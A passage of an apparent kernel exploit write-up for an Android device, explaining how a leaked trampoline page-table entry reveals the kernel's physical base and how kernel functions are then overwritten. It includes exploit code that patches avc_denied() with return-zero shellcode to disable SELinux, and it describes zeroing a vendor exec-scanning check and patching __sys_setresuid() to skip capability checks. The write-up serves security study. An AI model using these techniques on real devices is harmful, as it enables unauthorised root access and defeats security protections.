<p>In the author’s exploit, one of the referenced addresses is <strong><code class="language-plaintext highlighter-rouge">0x9c000</code></strong>. This address corresponds to <code class="language-plaintext highlighter-rouge">real_mode_header-&gt;trampoline_pgd</code> [1], the PGD that the real-mode trampoline code loads when it switches to long mode.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="n">__init</span> <span class="nf">setup_real_mode</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">u64</span> <span class="o">*</span><span class="n">trampoline_pgd</span><span class="p">;</span>
    <span class="c1">// [...]</span>
    <span class="n">trampoline_pgd</span> <span class="o">=</span> <span class="p">(</span><span class="n">u64</span> <span class="o">*</span><span class="p">)</span> <span class="n">__va</span><span class="p">(</span><span class="n">real_mode_header</span><span class="o">-&gt;</span><span class="n">trampoline_pgd</span> <span class="cm">/* 0x9c000 */</span><span class="p">);</span> <span class="c1">// [1]</span>
    <span class="n">trampoline_pgd</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">trampoline_pgd_entry</span><span class="p">.</span><span class="n">pgd</span><span class="p">;</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The value of its first entry, <code class="language-plaintext highlighter-rouge">trampoline_pgd_entry</code>, is set up in the function <code class="language-plaintext highlighter-rouge">init_trampoline_kaslr()</code> [2], which allocates a page using <code class="language-plaintext highlighter-rouge">alloc_low_page()</code> [3].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="n">__init</span> <span class="nf">init_trampoline</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">else</span>
        <span class="n">init_trampoline_kaslr</span><span class="p">();</span> <span class="c1">// &lt;------------</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="n">__meminit</span> <span class="nf">init_trampoline_kaslr</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">pud_page_tramp</span> <span class="o">=</span> <span class="n">alloc_low_page</span><span class="p">();</span> <span class="c1">// [3]</span>

    <span class="c1">// [...]</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">trampoline_pgd_entry</span> <span class="o">=</span>
            <span class="n">__pgd</span><span class="p">(</span><span class="n">_KERNPG_TABLE</span> <span class="o">|</span> <span class="n">__pa</span><span class="p">(</span><span class="n">pud_page_tramp</span><span class="p">));</span> <span class="c1">// [2]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The page is allocated internally from the PGT buffer.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">alloc_low_page</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">return</span> <span class="n">alloc_low_pages</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="c1">// &lt;------------</span>
<span class="p">}</span>

<span class="n">__ref</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">alloc_low_pages</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">num</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">pfn</span> <span class="o">=</span> <span class="n">pgt_buf_end</span><span class="p">;</span>
        <span class="n">pgt_buf_end</span> <span class="o">+=</span> <span class="n">num</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The PGT buffer is initialized in <code class="language-plaintext highlighter-rouge">early_alloc_pgt_buf()</code>, and its memory comes from <code class="language-plaintext highlighter-rouge">extend_brk()</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span>  <span class="n">__init</span> <span class="nf">early_alloc_pgt_buf</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">tables</span> <span class="o">=</span> <span class="n">INIT_PGT_BUF_SIZE</span><span class="p">;</span>
    <span class="n">phys_addr_t</span> <span class="n">base</span><span class="p">;</span>

    <span class="n">base</span> <span class="o">=</span> <span class="n">__pa</span><span class="p">(</span><span class="n">extend_brk</span><span class="p">(</span><span class="n">tables</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">));</span> <span class="c1">// &lt;------------</span>

    <span class="n">pgt_buf_start</span> <span class="o">=</span> <span class="n">base</span> <span class="o">&gt;&gt;</span> <span class="n">PAGE_SHIFT</span><span class="p">;</span>
    <span class="n">pgt_buf_end</span> <span class="o">=</span> <span class="n">pgt_buf_start</span><span class="p">;</span>
    <span class="n">pgt_buf_top</span> <span class="o">=</span> <span class="n">pgt_buf_start</span> <span class="o">+</span> <span class="p">(</span><span class="n">tables</span> <span class="o">&gt;&gt;</span> <span class="n">PAGE_SHIFT</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="o">*</span> <span class="n">__init</span> <span class="nf">extend_brk</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">size</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">align</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">size_t</span> <span class="n">mask</span> <span class="o">=</span> <span class="n">align</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span>
    <span class="kt">void</span> <span class="o">*</span><span class="n">ret</span><span class="p">;</span>

    <span class="n">_brk_end</span> <span class="o">=</span> <span class="p">(</span><span class="n">_brk_end</span> <span class="o">+</span> <span class="n">mask</span><span class="p">)</span> <span class="o">&amp;</span> <span class="o">~</span><span class="n">mask</span><span class="p">;</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">_brk_end</span><span class="p">;</span>
    <span class="n">_brk_end</span> <span class="o">+=</span> <span class="n">size</span><span class="p">;</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">ret</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">_brk_start</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span><span class="n">__brk_base</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">_brk_end</span>   <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span><span class="n">__brk_base</span><span class="p">;</span>
</code></pre></div></div>
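<p><code class="language-plaintext highlighter-rouge">extend_brk()</code> is a plain bump allocator: round the current end up to the requested alignment, hand out that address, then advance the end by the size. A minimal userspace model of that arithmetic follows. It tracks offsets instead of real kernel pointers, and <code class="language-plaintext highlighter-rouge">struct brk_model</code> and <code class="language-plaintext highlighter-rouge">model_extend_brk()</code> are illustrative names only.</p>

```c
#include <stddef.h>

/* Models _brk_end as a plain offset instead of a kernel virtual address. */
struct brk_model {
    size_t end;
};

/* Same arithmetic as extend_brk(): align up, return the start, bump the end. */
size_t model_extend_brk(struct brk_model *b, size_t size, size_t align)
{
    size_t mask = align - 1; /* align must be a power of two */
    size_t ret;

    b->end = (b->end + mask) & ~mask;
    ret = b->end;
    b->end += size;
    return ret;
}
```

<p>Starting from an unaligned end of <code class="language-plaintext highlighter-rouge">0x10123</code>, a page-aligned request of <code class="language-plaintext highlighter-rouge">0x6000</code> bytes (an example size) is placed at <code class="language-plaintext highlighter-rouge">0x11000</code>, and the next allocation continues at <code class="language-plaintext highlighter-rouge">0x17000</code>.</p>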

<p>Finally, we can see from the linker script that the brk area is <strong>actually kernel data</strong>, placed inside the kernel image. This explains why the physical address <code class="language-plaintext highlighter-rouge">0x9c000</code> contains another physical address located near the kernel base.</p>

<pre><code class="language-asm">// arch/x86/kernel/vmlinux.lds.S

// [...]
. = ALIGN(PAGE_SIZE);
.brk : AT(ADDR(.brk) - LOAD_OFFSET) {
    __brk_base = .;
    . += 64 * 1024;        /* 64k alignment slop space */
    *(.bss..brk)        /* areas brk users have reserved */
    __brk_limit = .;
}
// [...]
</code></pre>
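<p>Putting the chain together, the 8 bytes at physical address <code class="language-plaintext highlighter-rouge">0x9c000</code> should hold <code class="language-plaintext highlighter-rouge">_KERNPG_TABLE | __pa(pud_page_tramp)</code>. The sketch below shows one way to sanity-check a leaked value and extract the physical address. It assumes <code class="language-plaintext highlighter-rouge">_KERNPG_TABLE</code> evaluates to <code class="language-plaintext highlighter-rouge">0x63</code> (present, writable, accessed, dirty) with no memory-encryption bit set, and the helper names are hypothetical.</p>

```c
#include <stdbool.h>
#include <stdint.h>

/* Bits 12..51 of the entry hold the physical address of the next-level table. */
#define ENTRY_ADDR_MASK      0x000ffffffffff000ULL
/* Assumed flag value: Present | RW | Accessed | Dirty, without an encryption bit. */
#define ASSUMED_KERNPG_TABLE 0x63ULL

/* Does the leaked value look like a kernel page-table pointer? */
bool looks_like_trampoline_entry(uint64_t entry)
{
    return (entry & 0xfffULL) == ASSUMED_KERNPG_TABLE &&
           (entry & ENTRY_ADDR_MASK) != 0;
}

/* Physical address of the page the entry points to (inside the brk area). */
uint64_t trampoline_entry_to_phys(uint64_t entry)
{
    return entry & ENTRY_ADDR_MASK;
}
```

<p>Subtracting the build-specific offset of that brk page from the result would then give the physical base of the kernel image.</p>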

<h3 id="36-overwrite-kernel-function">3.6. Overwrite Kernel Function</h3>

<p>Now we have the physical address of the kernel text and fully control a page table, so we can overwrite kernel functions!</p>

<p>To achieve full root, we need to understand the mitigations on Android and bypass them.</p>

<h4 id="361-selinux">3.6.1. SELinux</h4>

<p>SELinux is a rule-based framework for enforcing mandatory access control (MAC) security policies. Rules define how subjects (domains) can interact with objects (types), specifying permissions and constraints. Common rule types include:</p>
<ul>
  <li><strong>allow</strong>: A whitelist rule permitting a subject (domain) to perform specific operations on an object.</li>
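  <li><strong>auditallow, dontaudit, neverallow</strong>: <code class="language-plaintext highlighter-rouge">auditallow</code> and <code class="language-plaintext highlighter-rouge">dontaudit</code> control whether an access attempt is logged or silently ignored, while <code class="language-plaintext highlighter-rouge">neverallow</code> is a policy-compile-time assertion that no allow rule may grant the given access.</li>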
  <li><strong>type_transition</strong>: Specifies the default type assigned to a newly created object in a given context.</li>
  <li><strong>type_change</strong>: Defines the type to assign when relabeling (changing the type) of an existing object.</li>
  <li>… and others.</li>
</ul>

<p>An <strong>access vector (AV)</strong> defines which permissions a subject (process or domain) has on a particular object (file, device, socket, etc.). The general form is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;subject&gt; &lt;object&gt;:&lt;class&gt; { &lt;permissions&gt; };
</code></pre></div></div>
<ul>
  <li><strong>subject</strong>: The domain (process context, e.g., <code class="language-plaintext highlighter-rouge">untrusted_app</code>).</li>
  <li><strong>object</strong>: The type of the target resource (e.g., <code class="language-plaintext highlighter-rouge">gxp_device</code>).</li>
  <li><strong>class</strong>: The object class (e.g., <code class="language-plaintext highlighter-rouge">file</code>, <code class="language-plaintext highlighter-rouge">dir</code>, <code class="language-plaintext highlighter-rouge">chr_file</code>, <code class="language-plaintext highlighter-rouge">socket</code>).</li>
  <li><strong>permissions</strong>: The permitted operations (e.g., <code class="language-plaintext highlighter-rouge">read</code>, <code class="language-plaintext highlighter-rouge">write</code>, <code class="language-plaintext highlighter-rouge">open</code>).</li>
</ul>

<p>For example,</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>allow untrusted_app gxp_device:chr_file { read write open };
</code></pre></div></div>

<p>This is an <strong>allow</strong> rule. It grants processes running in the <strong>domain <code class="language-plaintext highlighter-rouge">untrusted_app</code></strong> permission to perform <strong><code class="language-plaintext highlighter-rouge">read</code>, <code class="language-plaintext highlighter-rouge">write</code>, and <code class="language-plaintext highlighter-rouge">open</code></strong> operations on the <strong>object <code class="language-plaintext highlighter-rouge">gxp_device</code></strong>, which belongs to the <strong><code class="language-plaintext highlighter-rouge">chr_file</code> class</strong>.</p>

<p>With SELinux enabled, <strong>even the root user cannot access all resources</strong>. Therefore, it is necessary to disable it in order to bypass these restrictions.</p>

<p>But how does SELinux work? Let’s look at the kernel implementation.</p>

<p>The kernel calls <strong>security hooks</strong> (functions prefixed with <code class="language-plaintext highlighter-rouge">security_</code>) to check permissions in almost every operation. For example, consider <code class="language-plaintext highlighter-rouge">SYS_fork</code>. During process duplication, the function <code class="language-plaintext highlighter-rouge">security_task_alloc()</code> is invoked to perform a security check.</p>

<p>This function then calls <code class="language-plaintext highlighter-rouge">call_int_hook()</code> to iterate over <code class="language-plaintext highlighter-rouge">&amp;security_hook_heads.task_alloc</code> and invoke the registered SELinux hook <code class="language-plaintext highlighter-rouge">selinux_task_alloc()</code>, which validates whether the process has sufficient permissions to create a copy of itself.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">security_task_alloc</span><span class="p">(</span><span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">clone_flags</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">int</span> <span class="n">rc</span> <span class="o">=</span> <span class="n">lsm_task_alloc</span><span class="p">(</span><span class="n">task</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">rc</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">rc</span><span class="p">;</span>
    <span class="n">rc</span> <span class="o">=</span> <span class="n">call_int_hook</span><span class="p">(</span><span class="n">task_alloc</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">task</span><span class="p">,</span> <span class="n">clone_flags</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">rc</span><span class="p">))</span>
        <span class="n">security_task_free</span><span class="p">(</span><span class="n">task</span><span class="p">);</span>
    <span class="k">return</span> <span class="n">rc</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">selinux_task_alloc</span><span class="p">(</span><span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">,</span>
                  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">clone_flags</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">u32</span> <span class="n">sid</span> <span class="o">=</span> <span class="n">current_sid</span><span class="p">();</span>

    <span class="k">return</span> <span class="n">avc_has_perm</span><span class="p">(</span><span class="o">&amp;</span><span class="n">selinux_state</span><span class="p">,</span>
                <span class="n">sid</span><span class="p">,</span> <span class="n">sid</span><span class="p">,</span> <span class="n">SECCLASS_PROCESS</span><span class="p">,</span> <span class="n">PROCESS__FORK</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
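<p>The dispatch pattern can be modeled in a few lines of userspace C. This is only a sketch of the idea (walk the registered hooks and stop at the first non-zero result), not the kernel macro itself: the array of function pointers, <code class="language-plaintext highlighter-rouge">model_call_int_hook()</code>, and the two example hooks are all hypothetical.</p>

```c
#include <errno.h>
#include <stddef.h>

typedef int (*task_alloc_hook)(unsigned long clone_flags);

/* Counts how many hooks actually ran, to make the early exit visible. */
int hooks_called;

int hook_allow(unsigned long clone_flags)
{
    (void)clone_flags;
    hooks_called++;
    return 0;
}

int hook_deny(unsigned long clone_flags)
{
    (void)clone_flags;
    hooks_called++;
    return -EACCES;
}

/* Walk the hook list in order; the first non-zero return value wins. */
int model_call_int_hook(const task_alloc_hook *hooks, size_t n,
                        unsigned long clone_flags)
{
    int rc = 0;

    for (size_t i = 0; i < n; i++) {
        rc = hooks[i](clone_flags);
        if (rc != 0)
            break;
    }
    return rc;
}
```

<p>With the hooks <code class="language-plaintext highlighter-rouge">{hook_allow, hook_deny, hook_allow}</code>, the call returns <code class="language-plaintext highlighter-rouge">-EACCES</code> and the third hook never runs, which is why a single denying LSM is enough to fail the whole operation.</p>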

<p>Within <code class="language-plaintext highlighter-rouge">avc_has_perm()</code>, the function <code class="language-plaintext highlighter-rouge">avc_has_perm_noaudit()</code> is called to perform the permission check, and <code class="language-plaintext highlighter-rouge">avc_audit()</code> is called to determine whether an audit message should be generated.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">avc_has_perm</span><span class="p">(</span><span class="k">struct</span> <span class="n">selinux_state</span> <span class="o">*</span><span class="n">state</span><span class="p">,</span> <span class="n">u32</span> <span class="n">ssid</span><span class="p">,</span> <span class="n">u32</span> <span class="n">tsid</span><span class="p">,</span> <span class="n">u16</span> <span class="n">tclass</span><span class="p">,</span>
         <span class="n">u32</span> <span class="n">requested</span><span class="p">,</span> <span class="k">struct</span> <span class="n">common_audit_data</span> <span class="o">*</span><span class="n">auditdata</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">av_decision</span> <span class="n">avd</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">rc</span><span class="p">,</span> <span class="n">rc2</span><span class="p">;</span>

    <span class="n">rc</span> <span class="o">=</span> <span class="n">avc_has_perm_noaudit</span><span class="p">(</span><span class="n">state</span><span class="p">,</span> <span class="n">ssid</span> <span class="cm">/* source/domain id */</span><span class="p">,</span>
                                     <span class="n">tsid</span> <span class="cm">/* target id */</span><span class="p">,</span>
                                     <span class="n">tclass</span> <span class="cm">/* target class */</span><span class="p">,</span>
                                     <span class="n">requested</span> <span class="cm">/* operation */</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">avd</span><span class="p">);</span>

    <span class="n">rc2</span> <span class="o">=</span> <span class="n">avc_audit</span><span class="p">(</span><span class="n">state</span><span class="p">,</span> <span class="n">ssid</span><span class="p">,</span> <span class="n">tsid</span><span class="p">,</span> <span class="n">tclass</span><span class="p">,</span> <span class="n">requested</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">avd</span><span class="p">,</span> <span class="n">rc</span><span class="p">,</span>
            <span class="n">auditdata</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">rc2</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">rc2</span><span class="p">;</span>
    <span class="k">return</span> <span class="n">rc</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">avc_has_perm_noaudit()</code> first looks up the corresponding rule from the <strong>Access Vector Cache (AVC)</strong>. If the requested operations are not in the allow list [1], <code class="language-plaintext highlighter-rouge">avc_denied()</code> [2] is called to perform further checks.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kr">inline</span> <span class="kt">int</span> <span class="nf">avc_has_perm_noaudit</span><span class="p">(</span><span class="k">struct</span> <span class="n">selinux_state</span> <span class="o">*</span><span class="n">state</span><span class="p">,</span>
                <span class="n">u32</span> <span class="n">ssid</span><span class="p">,</span> <span class="n">u32</span> <span class="n">tsid</span><span class="p">,</span>
                <span class="n">u16</span> <span class="n">tclass</span><span class="p">,</span> <span class="n">u32</span> <span class="n">requested</span><span class="p">,</span>
                <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">,</span>
                <span class="k">struct</span> <span class="n">av_decision</span> <span class="o">*</span><span class="n">avd</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">avc_node</span> <span class="o">*</span><span class="n">node</span><span class="p">;</span>

    <span class="c1">// [...]</span>
    <span class="n">node</span> <span class="o">=</span> <span class="n">avc_lookup</span><span class="p">(</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">avc</span><span class="p">,</span> <span class="n">ssid</span><span class="p">,</span> <span class="n">tsid</span><span class="p">,</span> <span class="n">tclass</span><span class="p">);</span>
    
    <span class="c1">// [...]</span>
    <span class="n">denied</span> <span class="o">=</span> <span class="n">requested</span> <span class="o">&amp;</span> <span class="o">~</span><span class="p">(</span><span class="n">avd</span><span class="o">-&gt;</span><span class="n">allowed</span><span class="p">);</span> <span class="c1">// [1]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">denied</span><span class="p">))</span>
        <span class="n">rc</span> <span class="o">=</span> <span class="n">avc_denied</span><span class="p">(</span><span class="n">state</span><span class="p">,</span> <span class="n">ssid</span><span class="p">,</span> <span class="n">tsid</span><span class="p">,</span> <span class="n">tclass</span><span class="p">,</span> <span class="n">requested</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="c1">// [2]</span>
                <span class="n">flags</span><span class="p">,</span> <span class="n">avd</span><span class="p">);</span>

    <span class="c1">// [...]</span>
    <span class="k">return</span> <span class="n">rc</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Since SELinux is always in enforcing mode and the domain is typically not permissive, the check fails and returns <code class="language-plaintext highlighter-rouge">-EACCES</code> [3].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="n">noinline</span> <span class="kt">int</span> <span class="nf">avc_denied</span><span class="p">(</span><span class="k">struct</span> <span class="n">selinux_state</span> <span class="o">*</span><span class="n">state</span><span class="p">,</span>
                   <span class="n">u32</span> <span class="n">ssid</span><span class="p">,</span> <span class="n">u32</span> <span class="n">tsid</span><span class="p">,</span>
                   <span class="n">u16</span> <span class="n">tclass</span><span class="p">,</span> <span class="n">u32</span> <span class="n">requested</span><span class="p">,</span>
                   <span class="n">u8</span> <span class="n">driver</span><span class="p">,</span> <span class="n">u8</span> <span class="n">xperm</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">,</span>
                   <span class="k">struct</span> <span class="n">av_decision</span> <span class="o">*</span><span class="n">avd</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">AVC_STRICT</span><span class="p">)</span>
        <span class="k">return</span> <span class="o">-</span><span class="n">EACCES</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">enforcing_enabled</span><span class="p">(</span><span class="n">state</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="c1">// [3]</span>
        <span class="o">!</span><span class="p">(</span><span class="n">avd</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">AVD_FLAGS_PERMISSIVE</span><span class="p">))</span>
        <span class="k">return</span> <span class="o">-</span><span class="n">EACCES</span><span class="p">;</span>

    <span class="c1">// [...]</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
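<p>The decision logic of the two functions above can be condensed into a small userspace model. It is a simplified sketch: the AVC lookup, the extended-permission handling, and the cache update are omitted, and the <code class="language-plaintext highlighter-rouge">MODEL_*</code> constants and function names are stand-ins rather than kernel definitions.</p>

```c
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>

/* Stand-ins for AVC_STRICT and AVD_FLAGS_PERMISSIVE. */
#define MODEL_AVC_STRICT           0x1u
#define MODEL_AVD_FLAGS_PERMISSIVE 0x1u

struct model_avd {
    uint32_t allowed; /* bitmask of permitted operations */
    uint32_t flags;   /* per-domain flags, e.g. permissive */
};

/* Mirrors the avc_denied() branches shown above. */
int model_avc_denied(bool enforcing, unsigned int flags,
                     const struct model_avd *avd)
{
    if (flags & MODEL_AVC_STRICT)
        return -EACCES;
    if (enforcing && !(avd->flags & MODEL_AVD_FLAGS_PERMISSIVE))
        return -EACCES;
    return 0;
}

/* Mirrors the core of avc_has_perm_noaudit(): any missing bit is a denial. */
int model_has_perm(bool enforcing, uint32_t requested, unsigned int flags,
                   const struct model_avd *avd)
{
    uint32_t denied = requested & ~avd->allowed;

    return denied ? model_avc_denied(enforcing, flags, avd) : 0;
}
```

<p>In this model, a request for a bit outside <code class="language-plaintext highlighter-rouge">allowed</code> only succeeds when enforcing is off or the domain is permissive, so every denial funnels through the one function that decides the final return value.</p>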

<p>To disable SELinux, the most effective way is to <strong>patch <code class="language-plaintext highlighter-rouge">avc_denied()</code> so that it always returns zero</strong>, meaning the permission check always succeeds. The relevant part of the exploit is shown below:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">printf</span><span class="p">(</span><span class="s">"[+] overwrite avc_denied: 0x%016lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">avc_denied_w_pte</span><span class="p">);</span>
<span class="p">{</span>
    <span class="c1">// xor rax, rax ; ret</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">avc_denied_shellcode</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x31</span><span class="p">,</span> <span class="mh">0xc0</span><span class="p">,</span> <span class="mh">0xc3</span><span class="p">};</span>
    <span class="n">SYSCHK</span><span class="p">(</span><span class="n">write</span><span class="p">(</span><span class="n">reclaim_pfds</span><span class="p">[</span><span class="n">victim_pipe_idx</span><span class="p">][</span><span class="mi">1</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">avc_denied_w_pte</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">avc_denied_w_pte</span><span class="p">)));</span>

    <span class="c1">// back to tmp_page again</span>
    <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">read_data</span><span class="p">;</span>
    <span class="n">SYSCHK</span><span class="p">(</span><span class="n">read</span><span class="p">(</span><span class="n">reclaim_pfds</span><span class="p">[</span><span class="n">victim_pipe_idx</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">read_data</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">read_data</span><span class="p">)));</span>

    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">512</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">void</span> <span class="o">*</span><span class="n">ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">BASE_MMAP_ADDR</span> <span class="o">+</span> <span class="n">i</span> <span class="o">*</span> <span class="mh">0x200000</span><span class="p">;</span>
        <span class="n">memcpy</span><span class="p">(</span><span class="n">ptr</span> <span class="o">+</span> <span class="n">avc_denied_offset</span><span class="p">,</span> <span class="n">avc_denied_shellcode</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">avc_denied_shellcode</span><span class="p">));</span>
    <span class="p">}</span>
<span class="p">}</span>

</code></pre></div></div>
<h4 id="362-patch-the-corav-check">3.6.2. Patch the corav Check</h4>

<p>Furthermore, the <code class="language-plaintext highlighter-rouge">corav_scan()</code> function is invoked whenever a binary is executed. It blocks certain binaries from being used, so we need to patch <code class="language-plaintext highlighter-rouge">corav_initialized</code> to zero in order to disable this access check. Otherwise, spawning a shell would not be allowed.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">corav_scan</span><span class="p">(</span><span class="k">struct</span> <span class="n">linux_binprm</span> <span class="o">*</span><span class="n">bprm</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">corav_initialized</span><span class="p">)</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<h4 id="363-other-mitigations">3.6.3. Other Mitigations</h4>

<p>To escalate privileges to the root user, I first referred to the <a href="https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-YongLiu-USMA-Share-Kernel-Code.pdf">USMA attack</a> and patched one byte in <code class="language-plaintext highlighter-rouge">__sys_setresuid()</code> to bypass the <code class="language-plaintext highlighter-rouge">ns_capable_setid()</code> check:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">long</span> <span class="nf">__sys_setresuid</span><span class="p">(</span><span class="n">uid_t</span> <span class="n">ruid</span><span class="p">,</span> <span class="n">uid_t</span> <span class="n">euid</span><span class="p">,</span> <span class="n">uid_t</span> <span class="n">suid</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">ruid_new</span> <span class="o">||</span> <span class="n">euid_new</span> <span class="o">||</span> <span class="n">suid_new</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
        <span class="o">!</span><span class="n">ns_capable_setid</span><span class="p">(</span><span class="n">old</span><span class="o">-&gt;</span><span class="n">user_ns</span><span class="p">,</span> <span class="n">CAP_SETUID</span><span class="p">))</span>
        <span class="k">return</span> <span class="o">-</span><span class="n">EPERM</span><span class="p">;</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>
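
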